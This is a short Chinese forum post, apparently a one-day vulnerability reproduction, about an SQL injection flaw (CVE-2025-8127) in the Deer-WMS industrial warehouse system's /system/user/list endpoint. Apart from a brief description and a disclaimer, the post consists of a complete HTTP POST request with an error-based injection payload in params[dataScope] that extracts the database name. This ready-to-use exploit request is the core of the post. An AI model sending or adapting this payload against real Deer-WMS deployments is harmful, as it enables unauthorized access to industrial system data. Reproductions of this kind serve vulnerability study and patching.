1Day 复现 工控Deer-WMS系统SQL注入漏洞(CVE-2025-8127)-网络安全论坛-网络安全-阻击者联盟

1Day 复现 工控Deer-WMS系统SQL注入漏洞(CVE-2025-8127)

勾八徽章-资深玩家-阻击者联盟等级-LV2-阻击者联盟1个月前发布
210

内容声明

         本公众号只发1Day。内容仅限于检测修复与交流学习,如有他人利用此内容进行恶意攻击,本公众号不承担任何责任。

d2b5ca33bd20250812084411

漏洞描述

    Deer-WMS工控系统 /system/user/list 的params[dataScope]参数未对恶意命令进行严格过滤,导致sql注入漏洞,可读取系统数据库核心数据。

漏洞复现

POST /system/user/list HTTP/1.1
Host: 127.0.0.1:7001
Cookie: JSESSIONID=5ffda3ab-8334-4505-8dc6-ed991f34df48
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Connection: close
params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

d2b5ca33bd20250812084454

 

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布帖子
在手机上浏览此页面